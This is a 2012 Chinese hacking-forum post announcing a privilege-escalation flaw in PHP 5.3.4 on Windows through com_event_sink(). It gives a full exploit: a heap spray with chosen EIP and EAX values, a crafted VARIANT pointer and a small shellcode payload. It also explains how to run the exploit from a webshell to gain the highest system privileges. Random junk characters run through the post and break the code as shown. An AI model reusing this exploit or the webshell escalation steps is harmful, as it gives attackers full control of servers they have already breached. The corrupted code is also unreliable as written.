找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2103|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
8 E6 E7 d% U. q+ ~8 d4 [! O& _/ F3 i
测试方法如下:cmd /c x:\php\php.exe x:\test.php' k3 x! T7 j. k; P. j0 K: t

: f& w6 t9 q5 q下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php3 G5 [$ E% `0 p
这里是两个测试的截图:5 d" j: C9 B& s! C0 X2 t/ `/ x) u9 e

! |  d3 h( |0 F
7 p  l, h7 y. Y8 S8 f: H6 J, D: V1 E! U% i/ k8 l$ V

) p. {) E  a1 Q0 H5 B0 l( p2 x- \/ M# K8 ]
成功利用此漏洞的攻击者将获得系统的最高权限7 a- G- M% G& u% Y
  [; j2 \( h' Y7 y% K" l

: H$ p4 Y) }5 f* z* b9 `% c& L& k% ~" [6 F& u" C0 Z
1 {2 a6 j. i& ]! @' @

! x8 U+ Q9 a2 }' W5 d关于漏洞分析稍后附上。一下是PoC代码:" R* A6 r- K: F6 [

* ?; b$ [4 w6 S" c' O4 Y<?php3 m/ l/ B4 q" Y& L' i7 Y4 l. C  j
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞& i7 g8 l/ m1 x0 [: J4 S" y' x6 _
//$eip ="\x44\x43\x42\x41";. x) P- X1 H1 p' X" a0 T
$eip= "\x4b\xe8\x57\x78";
; W! ^2 O8 A( h/ b, i- a$eax ="\x80\x01\x8d\x04";, v5 O: N+ t, a/ D' a, R' v8 s
$deodrant="";
* p  n4 `& Z( d+ Q' A) f6 V$axespray = str_repeat($eip.$eax,0x80);! a  W, l# i  G2 d
//048d0190
7 C6 t6 P5 c" J3 ^! hecho strlen($axespray);
' [, r' [6 V( R; D/ H6 _8 Wecho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";7 U. T% d& H( B! @4 H
echo "Silic Group Hacker Army - BlackBap.Org";
3 m9 H8 k/ I* A3 ~5 o/ o1 a//19200 ==4B32 4b00% Q2 _0 l2 f' R% Z! U
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
3 r+ Z0 C# n* r5 w$terminate = "T";
  l/ C+ x  k" \" T; @$u[] =$deodrant;# _8 j" [5 v" ?0 ~
$r[] =$deodrant.$terminate;' c! T5 S: @0 D# U% i
$a[] =$deodrant.$terminate;7 Q; H2 B5 W& Y: k
$s[] =$deodrant.$terminate;
; a3 ^7 x$ n: `$ k$ w//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
, `$ U- i7 R9 {$vVar = new VARIANT(0x048d0000+180);
( }- N4 O" {7 u  [2 t6 C. W" m//弹窗代码(Shellcode)
' B, h5 ^/ t/ S. e$ p0 ^7 r) @$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
$ d& C$ w- f3 `# _$var2 = new VARIANT(0x41414242);
- E- ^' o4 {( A# l  W8 i. Ccom_event_sink($vVar,$var2,$buffer);0 D! \7 y# m  E2 ^5 q; I
?>
$ M, }  r" B/ L5 \- S+ p8 J

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表